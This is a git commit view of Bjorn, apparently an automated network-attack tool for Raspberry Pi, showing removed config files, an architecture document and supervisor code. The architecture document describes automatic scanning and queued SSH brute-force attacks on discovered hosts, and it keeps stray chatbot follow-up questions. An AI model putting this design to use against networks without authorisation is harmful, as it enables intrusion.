5 Commits

Author SHA1 Message Date
infinition
3fa4d5742a Update BluetoothUtils: enhance scanning duration, improve service checks, and add adapter reset functionality 2026-03-16 22:09:51 +01:00
infinition
df83cd2e92 Add notifier configuration management for Sentinel and LLM 2026-03-16 21:54:31 +01:00
infinition
b759ab6d4b Add LLM configuration and MCP server management UI and backend functionality
- Implemented a new SPA page for LLM Bridge and MCP Server settings in `llm-config.js`.
- Added functionality for managing LLM and MCP configurations, including toggling, saving settings, and testing connections.
- Created HTTP endpoints in `llm_utils.py` for handling LLM chat, status checks, and MCP server configuration.
- Integrated model fetching from LaRuche and Ollama backends.
- Enhanced error handling and logging for better debugging and user feedback.
2026-03-16 20:33:22 +01:00
infinition
aac77a3e76 Add Loki and Sentinel utility classes for web API endpoints
- Implemented LokiUtils class with GET and POST endpoints for managing scripts, jobs, and payloads.
- Added SentinelUtils class with GET and POST endpoints for managing events, rules, devices, and notifications.
- Both classes include error handling and JSON response formatting.
2026-03-14 22:33:10 +01:00
Fabien POLLY
eb20b168a6 Add RLUtils class for managing RL/AI dashboard endpoints
- Implemented methods for fetching AI stats, training history, and recent experiences.
- Added functionality to set operation mode (MANUAL, AUTO, AI) with appropriate handling.
- Included helper methods for querying the database and sending JSON responses.
- Integrated model metadata extraction for visualization purposes.
2026-02-18 22:36:10 +01:00
338 changed files with 79722 additions and 28454 deletions

2
.gitattributes vendored
View File

@@ -1,2 +0,0 @@
*.sh text eol=lf
*.py text eol=lf

15
.github/FUNDING.yml vendored
View File

@@ -1,15 +0,0 @@
# These are supported funding model platforms
#github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
#patreon: # Replace with a single Patreon username
#open_collective: # Replace with a single Open Collective username
#ko_fi: # Replace with a single Ko-fi username
#tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
#community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
#liberapay: # Replace with a single Liberapay username
#issuehunt: # Replace with a single IssueHunt username
#lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry
#polar: # Replace with a single Polar username
buy_me_a_coffee: infinition
#thanks_dev: # Replace with a single thanks.dev username
#custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']

View File

@@ -1,34 +0,0 @@
---
name: Bug report
about: Create a report to help us improve
title: ""
labels: ""
assignees: ""
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Scroll down to '....'
4. See error
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Hardware (please complete the following information):**
- Device: [e.g. iPhone6]
- OS: [e.g. iOS]
- Browser [e.g. chrome, safari]
- Version [e.g. 22]
**Additional context**
Add any other context about the problem here.

View File

@@ -1,11 +0,0 @@
---
# .github/ISSUE_TEMPLATE/config.yml
blank_issues_enabled: false
contact_links:
- name: Bjorn Community Support
url: https://github.com/infinition/bjorn/discussions
about: Please ask and answer questions here.
- name: Bjorn Security Reports
url: https://infinition.github.io/bjorn/SECURITY
about: Please report security vulnerabilities here.

View File

@@ -1,19 +0,0 @@
---
name: Feature request
about: Suggest an idea for this project
title: ""
labels: ""
assignees: ""
---
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.
**Additional context**
Add any other context or screenshots about the feature request here.

View File

@@ -1,12 +0,0 @@
# .github/dependabot.yml
version: 2
updates:
- package-ecosystem: "pip"
directory: "."
schedule:
interval: "weekly"
commit-message:
prefix: "fix(deps)"
open-pull-requests-limit: 5
target-branch: "dev"

137
.gitignore vendored
View File

@@ -1,137 +0,0 @@
# Node.js / npm
node_modules/
npm-debug.log*
yarn-debug.log*
yarn-error.log*
.pnpm-debug.log*
package-lock.json*
# TypeScript / TSX
dist/
*.tsbuildinfo
# Poetry
poetry.lock
# Environment variables
.env
.env.*.local
# Logs
logs
*.log
pnpm-debug.log*
lerna-debug.log*
# Dependency directories
jspm_packages/
# Optional npm cache directory
.npm
# Output of 'npm pack'
*.tgz
# Lockfiles
yarn.lock
.pnpm-lock.yaml
# Optional eslint cache
.eslintcache
# Optional stylelint cache
.stylelintcache
# Optional REPL history
.node_repl_history
# Coverage directory used by tools like
instanbul/
istanbul/jest
jest/
coverage/
# Output of 'tsc' command
out/
build/
tmp/
temp/
# Python
__pycache__/
*.py[cod]
*.so
*.egg
*.egg-info/
pip-wheel-metadata/
*.pyo
*.pyd
*.whl
*.pytest_cache/
.tox/
env/
venv
venv/
ENV/
env.bak/
.venv/
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# Coverage reports
htmlcov/
.coverage
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
# Jupyter Notebook
.ipynb_checkpoints
# Django stuff:
staticfiles/
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# VS Code settings
.vscode/
.idea/
# macOS files
.DS_Store
.AppleDouble
.LSOverride
# Windows files
Thumbs.db
ehthumbs.db
Desktop.ini
$RECYCLE.BIN/
# Linux system files
*.swp
*~
# IDE specific
*.iml
*.suo
*.ntvs*
*.njsproj
*.sln
*.sw?
scripts
*/certs/

652
.pylintrc
View File

@@ -1,652 +0,0 @@
[MAIN]
# Analyse import fallback blocks. This can be used to support both Python 2 and
# 3 compatible code, which means that the block might have code that exists
# only in one or another interpreter, leading to false positives when analysed.
analyse-fallback-blocks=no
# Clear in-memory caches upon conclusion of linting. Useful if running pylint
# in a server-like mode.
clear-cache-post-run=no
# Load and enable all available extensions. Use --list-extensions to see a list
# all available extensions.
#enable-all-extensions=
# In error mode, messages with a category besides ERROR or FATAL are
# suppressed, and no reports are done by default. Error mode is compatible with
# disabling specific errors.
#errors-only=
# Always return a 0 (non-error) status code, even if lint errors are found.
# This is primarily useful in continuous integration scripts.
#exit-zero=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code.
extension-pkg-allow-list=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code. (This is an alternative name to extension-pkg-allow-list
# for backward compatibility.)
extension-pkg-whitelist=
# Return non-zero exit code if any of these messages/categories are detected,
# even if score is above --fail-under value. Syntax same as enable. Messages
# specified are enabled, while categories only check already-enabled messages.
fail-on=
# Specify a score threshold under which the program will exit with error.
fail-under=8
# Interpret the stdin as a python script, whose filename needs to be passed as
# the module_or_package argument.
#from-stdin=
# Files or directories to be skipped. They should be base names, not paths.
ignore=venv,node_modules,scripts
# Add files or directories matching the regular expressions patterns to the
# ignore-list. The regex matches against paths and can be in Posix or Windows
# format. Because '\\' represents the directory delimiter on Windows systems,
# it can't be used as an escape character.
ignore-paths=
# Files or directories matching the regular expression patterns are skipped.
# The regex matches against base names, not paths. The default value ignores
# Emacs file locks
ignore-patterns=^\.#
# List of module names for which member attributes should not be checked and
# will not be imported (useful for modules/projects where namespaces are
# manipulated during runtime and thus existing member attributes cannot be
# deduced by static analysis). It supports qualified module names, as well as
# Unix pattern matching.
ignored-modules=
# Python code to execute, usually for sys.path manipulation such as
# pygtk.require().
#init-hook=
# Use multiple processes to speed up Pylint. Specifying 0 will auto-detect the
# number of processors available to use, and will cap the count on Windows to
# avoid hangs.
jobs=1
# Control the amount of potential inferred values when inferring a single
# object. This can help the performance when dealing with large functions or
# complex, nested conditions.
limit-inference-results=100
# List of plugins (as comma separated values of python module names) to load,
# usually to register additional checkers.
load-plugins=
# Pickle collected data for later comparisons.
persistent=yes
# Resolve imports to .pyi stubs if available. May reduce no-member messages and
# increase not-an-iterable messages.
prefer-stubs=no
# Minimum Python version to use for version dependent checks. Will default to
# the version used to run pylint.
py-version=3.12
# Discover python modules and packages in the file system subtree.
recursive=no
# Add paths to the list of the source roots. Supports globbing patterns. The
# source root is an absolute path or a path relative to the current working
# directory used to determine a package namespace for modules located under the
# source root.
source-roots=
# When enabled, pylint would attempt to guess common misconfiguration and emit
# user-friendly hints instead of false-positive error messages.
suggestion-mode=yes
# Allow loading of arbitrary C extensions. Extensions are imported into the
# active Python interpreter and may run arbitrary code.
unsafe-load-any-extension=no
# In verbose mode, extra non-checker-related info will be displayed.
#verbose=
[BASIC]
# Naming style matching correct argument names.
argument-naming-style=snake_case
# Regular expression matching correct argument names. Overrides argument-
# naming-style. If left empty, argument names will be checked with the set
# naming style.
#argument-rgx=
# Naming style matching correct attribute names.
attr-naming-style=snake_case
# Regular expression matching correct attribute names. Overrides attr-naming-
# style. If left empty, attribute names will be checked with the set naming
# style.
#attr-rgx=
# Bad variable names which should always be refused, separated by a comma.
bad-names=foo,
bar,
baz,
toto,
tutu,
tata
# Bad variable names regexes, separated by a comma. If names match any regex,
# they will always be refused
bad-names-rgxs=
# Naming style matching correct class attribute names.
class-attribute-naming-style=any
# Regular expression matching correct class attribute names. Overrides class-
# attribute-naming-style. If left empty, class attribute names will be checked
# with the set naming style.
#class-attribute-rgx=
# Naming style matching correct class constant names.
class-const-naming-style=UPPER_CASE
# Regular expression matching correct class constant names. Overrides class-
# const-naming-style. If left empty, class constant names will be checked with
# the set naming style.
#class-const-rgx=
# Naming style matching correct class names.
class-naming-style=PascalCase
# Regular expression matching correct class names. Overrides class-naming-
# style. If left empty, class names will be checked with the set naming style.
#class-rgx=
# Naming style matching correct constant names.
const-naming-style=UPPER_CASE
# Regular expression matching correct constant names. Overrides const-naming-
# style. If left empty, constant names will be checked with the set naming
# style.
#const-rgx=
# Minimum line length for functions/classes that require docstrings, shorter
# ones are exempt.
docstring-min-length=-1
# Naming style matching correct function names.
function-naming-style=snake_case
# Regular expression matching correct function names. Overrides function-
# naming-style. If left empty, function names will be checked with the set
# naming style.
#function-rgx=
# Good variable names which should always be accepted, separated by a comma.
good-names=i,
j,
k,
ex,
Run,
_
# Good variable names regexes, separated by a comma. If names match any regex,
# they will always be accepted
good-names-rgxs=
# Include a hint for the correct naming format with invalid-name.
include-naming-hint=no
# Naming style matching correct inline iteration names.
inlinevar-naming-style=any
# Regular expression matching correct inline iteration names. Overrides
# inlinevar-naming-style. If left empty, inline iteration names will be checked
# with the set naming style.
#inlinevar-rgx=
# Naming style matching correct method names.
method-naming-style=snake_case
# Regular expression matching correct method names. Overrides method-naming-
# style. If left empty, method names will be checked with the set naming style.
#method-rgx=
# Naming style matching correct module names.
module-naming-style=snake_case
# Regular expression matching correct module names. Overrides module-naming-
# style. If left empty, module names will be checked with the set naming style.
#module-rgx=
# Colon-delimited sets of names that determine each other's naming style when
# the name regexes allow several styles.
name-group=
# Regular expression which should only match function or class names that do
# not require a docstring.
no-docstring-rgx=^_
# List of decorators that produce properties, such as abc.abstractproperty. Add
# to this list to register other decorators that produce valid properties.
# These decorators are taken in consideration only for invalid-name.
property-classes=abc.abstractproperty
# Regular expression matching correct type alias names. If left empty, type
# alias names will be checked with the set naming style.
#typealias-rgx=
# Regular expression matching correct type variable names. If left empty, type
# variable names will be checked with the set naming style.
#typevar-rgx=
# Naming style matching correct variable names.
variable-naming-style=snake_case
# Regular expression matching correct variable names. Overrides variable-
# naming-style. If left empty, variable names will be checked with the set
# naming style.
variable-rgx=[a-z_][a-z0-9_]{2,30}$
[CLASSES]
# Warn about protected attribute access inside special methods
check-protected-access-in-special-methods=no
# List of method names used to declare (i.e. assign) instance attributes.
defining-attr-methods=__init__,
__new__,
setUp,
asyncSetUp,
__post_init__
# List of member names, which should be excluded from the protected access
# warning.
exclude-protected=_asdict,_fields,_replace,_source,_make,os._exit
# List of valid names for the first argument in a class method.
valid-classmethod-first-arg=cls
# List of valid names for the first argument in a metaclass class method.
valid-metaclass-classmethod-first-arg=mcs
[DESIGN]
# List of regular expressions of class ancestor names to ignore when counting
# public methods (see R0903)
exclude-too-few-public-methods=
# List of qualified class names to ignore when counting class parents (see
# R0901)
ignored-parents=
# Maximum number of arguments for function / method.
max-args=5
# Maximum number of attributes for a class (see R0902).
max-attributes=7
# Maximum number of boolean expressions in an if statement (see R0916).
max-bool-expr=5
# Maximum number of branch for function / method body.
max-branches=12
# Maximum number of locals for function / method body.
max-locals=15
# Maximum number of parents for a class (see R0901).
max-parents=7
# Maximum number of positional arguments for function / method.
max-positional-arguments=5
# Maximum number of public methods for a class (see R0904).
max-public-methods=20
# Maximum number of return / yield for function / method body.
max-returns=6
# Maximum number of statements in function / method body.
max-statements=50
# Minimum number of public methods for a class (see R0903).
min-public-methods=2
[EXCEPTIONS]
# Exceptions that will emit a warning when caught.
overgeneral-exceptions=builtins.BaseException,builtins.Exception
[FORMAT]
# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
expected-line-ending-format=
# Regexp for a line that is allowed to be longer than the limit.
ignore-long-lines=^\s*(# )?<?https?://\S+>?$
# Number of spaces of indent required inside a hanging or continued line.
indent-after-paren=4
# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1
# tab).
indent-string=' '
# Maximum number of characters on a single line.
max-line-length=100
# Maximum number of lines in a module.
max-module-lines=2500
# Allow the body of a class to be on the same line as the declaration if body
# contains single statement.
single-line-class-stmt=no
# Allow the body of an if to be on the same line as the test if there is no
# else.
single-line-if-stmt=no
[IMPORTS]
# List of modules that can be imported at any level, not just the top level
# one.
allow-any-import-level=
# Allow explicit reexports by alias from a package __init__.
allow-reexport-from-package=no
# Allow wildcard imports from modules that define __all__.
allow-wildcard-with-all=no
# Deprecated modules which should not be used, separated by a comma.
deprecated-modules=
# Output a graph (.gv or any supported image format) of external dependencies
# to the given file (report RP0402 must not be disabled).
ext-import-graph=
# Output a graph (.gv or any supported image format) of all (i.e. internal and
# external) dependencies to the given file (report RP0402 must not be
# disabled).
import-graph=
# Output a graph (.gv or any supported image format) of internal dependencies
# to the given file (report RP0402 must not be disabled).
int-import-graph=
# Force import order to recognize a module as part of the standard
# compatibility libraries.
known-standard-library=
# Force import order to recognize a module as part of a third party library.
known-third-party=enchant
# Couples of modules and preferred modules, separated by a comma.
preferred-modules=
[LOGGING]
# The type of string formatting that logging methods do. `old` means using %
# formatting, `new` is for `{}` formatting.
logging-format-style=new
# Logging modules to check that the string format arguments are in logging
# function parameter format.
logging-modules=logging
[MESSAGES CONTROL]
# Only show warnings with the listed confidence levels. Leave empty to show
# all. Valid levels: HIGH, CONTROL_FLOW, INFERENCE, INFERENCE_FAILURE,
# UNDEFINED.
confidence=HIGH,
CONTROL_FLOW,
INFERENCE,
INFERENCE_FAILURE,
UNDEFINED
# Disable the message, report, category or checker with the given id(s). You
# can either give multiple identifiers separated by comma (,) or put this
# option multiple times (only on the command line, not in the configuration
# file where it should appear only once). You can also use "--disable=all" to
# disable everything first and then re-enable specific checks. For example, if
# you want to run only the similarities checker, you can use "--disable=all
# --enable=similarities". If you want to run only the classes checker, but have
# no Warning level messages displayed, use "--disable=all --enable=classes
# --disable=W".
disable=missing-module-docstring,
invalid-name,
too-few-public-methods,
E1101,
C0115,
duplicate-code,
raise-missing-from,
wrong-import-order,
ungrouped-imports,
reimported,
too-many-locals,
missing-timeout,
broad-exception-caught,
broad-exception-raised,
line-too-long
# Enable the message, report, category or checker with the given id(s). You can
# either give multiple identifier separated by comma (,) or put this option
# multiple time (only on the command line, not in the configuration file where
# it should appear only once). See also the "--disable" option for examples.
#enable=
[METHOD_ARGS]
# List of qualified names (i.e., library.method) which require a timeout
# parameter e.g. 'requests.api.get,requests.api.post'
timeout-methods=requests.api.delete,requests.api.get,requests.api.head,requests.api.options,requests.api.patch,requests.api.post,requests.api.put,requests.api.request
[MISCELLANEOUS]
# List of note tags to take in consideration, separated by a comma.
notes=FIXME,
XXX,
TODO
# Regular expression of note tags to take in consideration.
notes-rgx=
[REFACTORING]
# Maximum number of nested blocks for function / method body
max-nested-blocks=5
# Complete name of functions that never returns. When checking for
# inconsistent-return-statements if a never returning function is called then
# it will be considered as an explicit return statement and no message will be
# printed.
never-returning-functions=sys.exit,argparse.parse_error
# Let 'consider-using-join' be raised when the separator to join on would be
# non-empty (resulting in expected fixes of the type: ``"- " + " -
# ".join(items)``)
suggest-join-with-non-empty-separator=yes
[REPORTS]
# Python expression which should return a score less than or equal to 10. You
# have access to the variables 'fatal', 'error', 'warning', 'refactor',
# 'convention', and 'info' which contain the number of messages in each
# category, as well as 'statement' which is the total number of statements
# analyzed. This score is used by the global evaluation report (RP0004).
evaluation=max(0, 0 if fatal else 10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10))
# Template used to display messages. This is a python new-style format string
# used to format the message information. See doc for all details.
msg-template=
# Set the output format. Available formats are: text, parseable, colorized,
# json2 (improved json format), json (old json format) and msvs (visual
# studio). You can also give a reporter class, e.g.
# mypackage.mymodule.MyReporterClass.
#output-format=
# Tells whether to display a full report or only the messages.
reports=no
# Activate the evaluation score.
score=yes
[SIMILARITIES]
# Comments are removed from the similarity computation
ignore-comments=yes
# Docstrings are removed from the similarity computation
ignore-docstrings=yes
# Imports are removed from the similarity computation
ignore-imports=yes
# Signatures are removed from the similarity computation
ignore-signatures=yes
# Minimum lines number of a similarity.
min-similarity-lines=4
[SPELLING]
# Limits count of emitted suggestions for spelling mistakes.
max-spelling-suggestions=4
# Spelling dictionary name. No available dictionaries : You need to install
# both the python package and the system dependency for enchant to work.
spelling-dict=
# List of comma separated words that should be considered directives if they
# appear at the beginning of a comment and should not be checked.
spelling-ignore-comment-directives=fmt: on,fmt: off,noqa:,noqa,nosec,isort:skip,mypy:
# List of comma separated words that should not be checked.
spelling-ignore-words=
# A path to a file that contains the private dictionary; one word per line.
spelling-private-dict-file=
# Tells whether to store unknown words to the private dictionary (see the
# --spelling-private-dict-file option) instead of raising a message.
spelling-store-unknown-words=no
[STRING]
# This flag controls whether inconsistent-quotes generates a warning when the
# character used as a quote delimiter is used inconsistently within a module.
check-quote-consistency=no
# This flag controls whether the implicit-str-concat should generate a warning
# on implicit string concatenation in sequences defined over several lines.
check-str-concat-over-line-jumps=no
[TYPECHECK]
# List of decorators that produce context managers, such as
# contextlib.contextmanager. Add to this list to register other decorators that
# produce valid context managers.
contextmanager-decorators=contextlib.contextmanager
# List of members which are set dynamically and missed by pylint inference
# system, and so shouldn't trigger E1101 when accessed. Python regular
# expressions are accepted.
generated-members=
# Tells whether to warn about missing members when the owner of the attribute
# is inferred to be None.
ignore-none=yes
# This flag controls whether pylint should warn about no-member and similar
# checks whenever an opaque object is returned when inferring. The inference
# can return multiple potential results while evaluating a Python object, but
# some branches might not be evaluated, which results in partial inference. In
# that case, it might be useful to still emit no-member and other checks for
# the rest of the inferred objects.
ignore-on-opaque-inference=yes
# List of symbolic message names to ignore for Mixin members.
ignored-checks-for-mixins=no-member,
not-async-context-manager,
not-context-manager,
attribute-defined-outside-init
# List of class names for which member attributes should not be checked (useful
# for classes with dynamically set attributes). This supports the use of
# qualified names.
ignored-classes=optparse.Values,thread._local,_thread._local,argparse.Namespace
# Show a hint with possible names when a member name was not found. The aspect
# of finding the hint is based on edit distance.
missing-member-hint=yes
# The minimum edit distance a name should have in order to be considered a
# similar match for a missing member name.
missing-member-hint-distance=1
# The total number of similar names that should be taken in consideration when
# showing a hint for a missing member.
missing-member-max-choices=1
# Regex pattern to define which classes are considered mixins.
mixin-class-rgx=.*[Mm]ixin
# List of decorators that change the signature of a decorated function.
signature-mutators=
[VARIABLES]
# List of additional names supposed to be defined in builtins. Remember that
# you should avoid defining new builtins when possible.
additional-builtins=
# Tells whether unused global variables should be treated as a violation.
allow-global-unused-variables=yes
# List of names allowed to shadow builtins
allowed-redefined-builtins=
# List of strings which can identify a callback function by name. A callback
# name must start or end with one of those strings.
callbacks=cb_,
_cb
# A regular expression matching the name of dummy variables (i.e. expected to
# not be used).
dummy-variables-rgx=_+$|(_[a-zA-Z0-9_]*[a-zA-Z0-9]+?$)|dummy|^ignored_|^unused_
# Argument names that match this expression will be ignored.
ignored-argument-names=_.*|^ignored_|^unused_
# Tells whether we should check for unused import in __init__ files.
init-import=no
# List of qualified module names which can have objects that can redefine
# builtins.
redefining-builtins-modules=six.moves,past.builtins,future.builtins,builtins,io

View File

@@ -1,148 +0,0 @@
# Bjorn Cyberviking Architecture
This document describes the internal workings of **Bjorn Cyberviking**.
> The architecture is designed to be **modular and asynchronous**, using multi-threading to handle the display, web interface, and cyber-security operations (scanning, attacks) simultaneously.
-----
## 1\. High-Level Overview
The system relies on a **"Producer-Consumer"** model orchestrated around shared memory and a central database.
### System Data Flow
* **User / WebUI**: Interacts with the `WebApp`, which uses `WebUtils` to read/write to the **SQLite DB**.
* **Kernel (Main Thread)**: `Bjorn.py` initializes the `SharedData` (global state in RAM).
* **Brain (Logic)**:
* **Scheduler**: Plans actions based on triggers and writes them to the DB.
* **Orchestrator**: Reads the queue from the DB, executes scripts from `/actions`, and updates results in the DB.
* **Output (Display)**: `Display.py` reads the current state from `SharedData` and renders it to the E-Paper Screen.
-----
## 2\. Core Components
### 2.1. The Entry Point (`Bjorn.py`)
This is the global conductor.
* **Role**: Initializes components, manages the application lifecycle, and handles stop signals.
* **Workflow**:
1. Loads configuration via `SharedData`.
2. Starts the display thread (`Display`).
3. Starts the web server thread (`WebApp`).
4. **Network Monitor**: As soon as an interface (Wi-Fi/Eth) is active, it starts the **Orchestrator** thread (automatic mode). If the network drops, it can pause the orchestrator.
### 2.2. Central Memory (`shared.py`)
This is the backbone of the program.
* **Role**: Stores the global state of Bjorn, accessible by all threads.
* **Content**:
* **Configuration**: Loaded from the DB (`config`).
* **Runtime State**: Current status (`IDLE`, `SCANNING`...), displayed text, indicators (wifi, bluetooth, battery).
* **Resources**: File paths, fonts, images loaded into RAM.
* **Singleton DB**: A unique instance of `BjornDatabase` to avoid access conflicts.
### 2.3. Persistent Storage (`database.py`)
A facade (wrapper) for **SQLite**.
* **Architecture**: Delegates specific operations to sub-modules (in `db_utils/`) to keep the code clean (e.g., `HostOps`, `QueueOps`, `VulnerabilityOps`).
* **Role**: Ensures persistence of discovered hosts, vulnerabilities, the action queue, and logs.
-----
## 3\. The Operational Core: Scheduler vs Orchestrator
This is where Bjorn's "intelligence" lies. The system separates **decision** from **action**.
### 3.1. The Scheduler (`action_scheduler.py`)
*It "thinks" but does not act.*
* **Role**: Analyzes the environment and populates the queue (`action_queue`).
* **Logic**:
* It loops regularly to check **Triggers** defined in actions (e.g., `on_new_host`, `on_open_port:80`, `on_interval:600`).
* If a condition is met (e.g., a new PC is discovered), it inserts the corresponding action into the database with the status `pending`.
* It manages priorities and avoids duplicates.
### 3.2. The Orchestrator (`orchestrator.py`)
*It acts but does not deliberate on strategic consequences.*
* **Role**: Consumes the queue.
* **Logic**:
1. Requests the next priority action (`pending`) from the DB.
2. Dynamically loads the corresponding Python module from the `/actions` folder (via `importlib`).
3. Executes the `run()` or `execute()` method of the action.
4. Updates the result (`success`/`failed`) in the DB.
5. Updates the status displayed on the screen (via `SharedData`).
-----
## 4\. User Interface
### 4.1. E-Ink Display (`display.py` & `epd_manager.py`)
* **EPD Manager**: `epd_manager.py` is a singleton handling low-level hardware access (SPI) to prevent conflicts and manage hardware timeouts.
* **Rendering**: `display.py` constructs the image in memory (**PIL**) by assembling:
* Bjorn's face (based on current status).
* Statistics (skulls, lightning bolts, coins).
* The "catchphrase" (generated by `comment.py`).
* **Optimization**: Uses partial refresh to avoid black/white flashing, except for periodic maintenance.
### 4.2. Web Interface (`webapp.py`)
* **Server**: A custom multi-threaded `http.server` (no heavy frameworks like Flask/Django to ensure lightness).
* **Architecture**:
* API requests are dynamically routed to `WebUtils` (`utils.py`).
* The frontend communicates primarily in **JSON**.
* Handles authentication and GZIP compression of assets.
### 4.3. The Commentator (`comment.py`)
Provides Bjorn's personality. It selects phrases from the database based on context (e.g., *"Bruteforcing SSH..."*) and the configured language, with a weighting and delay system to avoid spamming.
-----
Voici la section mise à jour avec le flux logique pour une attaque SSH sur le port 22 :
***
## 5. Typical Data Flow (Example)
Here is what happens when Bjorn identifies a vulnerable service:
1. **Scanning (Action)**: The Orchestrator executes a scan. It discovers IP `192.168.1.50` has **port 22 (SSH) open**.
2. **Storage**: The scanner saves the host and port status to the DB.
3. **Reaction (Scheduler)**: In the next cycle, the `ActionScheduler` detects the open port. It checks actions that have the `on_open_port:22` trigger.
4. **Planning**: It adds the `SSHBruteforce` action to the `action_queue` for this IP.
5. **Execution (Orchestrator)**: The Orchestrator finishes its current task, sees the `SSHBruteforce` in the queue, picks it up, and starts the dictionary attack.
6. **Feedback (Display)**: `SharedData` is updated. The screen displays *"Cracking 192.168.1.50"* with the corresponding face.
7. **Web**: The user sees the attack attempt and real-time logs on the web dashboard.
***
**Would you like me to create a diagram to illustrate this specific attack flow?**
-----
## 6\. Folder Structure
Although not provided here, the architecture implies this structure:
```text
/
├── Bjorn.py # Root program entry
├── orchestrator.py # Action consumer
├── shared.py # Shared memory
├── actions/ # Python modules containing attack/scan logic (dynamically loaded)
├── data/ # Stores bjorn.db and logs
├── web/ # HTML/JS/CSS files for the interface
└── resources/ # Images, fonts (.bmp, .ttf)
```
-----
**Would you like me to generate a Mermaid.js diagram code block (Flowchart) to visualize the Scheduler/Orchestrator loop described in section 3?**

754
Bjorn.py
View File

@@ -1,173 +1,713 @@
# bjorn.py
import threading
import signal
# Bjorn.py
# Main entry point and supervisor for the Bjorn project
# Manages lifecycle of threads, health monitoring, and crash protection.
# OPTIMIZED FOR PI ZERO 2: Low CPU overhead, aggressive RAM management.
import logging
import time
import sys
import os
import signal
import subprocess
import re
from init_shared import shared_data
from display import Display, handle_exit_display
import sys
import threading
import time
import gc
import tracemalloc
import atexit
from comment import Commentaireia
from webapp import web_thread, handle_exit_web
from orchestrator import Orchestrator
from display import Display, handle_exit_display
from init_shared import shared_data
from logger import Logger
from orchestrator import Orchestrator
from runtime_state_updater import RuntimeStateUpdater
from webapp import web_thread
logger = Logger(name="Bjorn.py", level=logging.DEBUG)
_shutdown_lock = threading.Lock()
_shutdown_started = False
_instance_lock_fd = None
_instance_lock_path = "/tmp/bjorn_160226.lock"
try:
import fcntl
except Exception:
fcntl = None
def _release_instance_lock():
global _instance_lock_fd
if _instance_lock_fd is None:
return
try:
if fcntl is not None:
try:
fcntl.flock(_instance_lock_fd.fileno(), fcntl.LOCK_UN)
except Exception:
pass
_instance_lock_fd.close()
except Exception:
pass
_instance_lock_fd = None
def _acquire_instance_lock() -> bool:
"""Ensure only one Bjorn_160226 process can run at once."""
global _instance_lock_fd
if _instance_lock_fd is not None:
return True
try:
fd = open(_instance_lock_path, "a+", encoding="utf-8")
except Exception as exc:
logger.error(f"Unable to open instance lock file {_instance_lock_path}: {exc}")
return True
if fcntl is None:
_instance_lock_fd = fd
return True
try:
fcntl.flock(fd.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
fd.seek(0)
fd.truncate()
fd.write(str(os.getpid()))
fd.flush()
except OSError:
try:
fd.seek(0)
owner_pid = fd.read().strip() or "unknown"
except Exception:
owner_pid = "unknown"
logger.critical(f"Another Bjorn instance is already running (pid={owner_pid}).")
try:
fd.close()
except Exception:
pass
return False
_instance_lock_fd = fd
return True
class HealthMonitor(threading.Thread):
"""Periodic runtime health logger (threads/fd/rss/queue/epd metrics)."""
def __init__(self, shared_data_, interval_s: int = 60):
super().__init__(daemon=True, name="HealthMonitor")
self.shared_data = shared_data_
self.interval_s = max(10, int(interval_s))
self._stop_event = threading.Event()
self._tm_prev_snapshot = None
self._tm_last_report = 0.0
def stop(self):
self._stop_event.set()
def _fd_count(self) -> int:
try:
return len(os.listdir("/proc/self/fd"))
except Exception:
return -1
def _rss_kb(self) -> int:
try:
with open("/proc/self/status", "r", encoding="utf-8") as fh:
for line in fh:
if line.startswith("VmRSS:"):
parts = line.split()
if len(parts) >= 2:
return int(parts[1])
except Exception:
pass
return -1
def _queue_counts(self):
pending = running = scheduled = -1
try:
# Using query_one safe method from database
row = self.shared_data.db.query_one(
"""
SELECT
SUM(CASE WHEN status='pending' THEN 1 ELSE 0 END) AS pending,
SUM(CASE WHEN status='running' THEN 1 ELSE 0 END) AS running,
SUM(CASE WHEN status='scheduled' THEN 1 ELSE 0 END) AS scheduled
FROM action_queue
"""
)
if row:
pending = int(row.get("pending") or 0)
running = int(row.get("running") or 0)
scheduled = int(row.get("scheduled") or 0)
except Exception as exc:
logger.error_throttled(
f"Health monitor queue count query failed: {exc}",
key="health_queue_counts",
interval_s=120,
)
return pending, running, scheduled
def run(self):
while not self._stop_event.wait(self.interval_s):
try:
threads = threading.enumerate()
thread_count = len(threads)
top_threads = ",".join(t.name for t in threads[:8])
fd_count = self._fd_count()
rss_kb = self._rss_kb()
pending, running, scheduled = self._queue_counts()
# Lock to safely read shared metrics without race conditions
with self.shared_data.health_lock:
display_metrics = dict(getattr(self.shared_data, "display_runtime_metrics", {}) or {})
epd_enabled = int(display_metrics.get("epd_enabled", 0))
epd_failures = int(display_metrics.get("failed_updates", 0))
epd_reinit = int(display_metrics.get("reinit_attempts", 0))
epd_headless = int(display_metrics.get("headless", 0))
epd_last_success = display_metrics.get("last_success_epoch", 0)
logger.info(
"health "
f"thread_count={thread_count} "
f"rss_kb={rss_kb} "
f"queue_pending={pending} "
f"epd_failures={epd_failures} "
f"epd_reinit={epd_reinit} "
)
# Optional: tracemalloc report (only if enabled via PYTHONTRACEMALLOC or tracemalloc.start()).
try:
if tracemalloc.is_tracing():
now = time.monotonic()
tm_interval = float(self.shared_data.config.get("tracemalloc_report_interval_s", 300) or 300)
if tm_interval > 0 and (now - self._tm_last_report) >= tm_interval:
self._tm_last_report = now
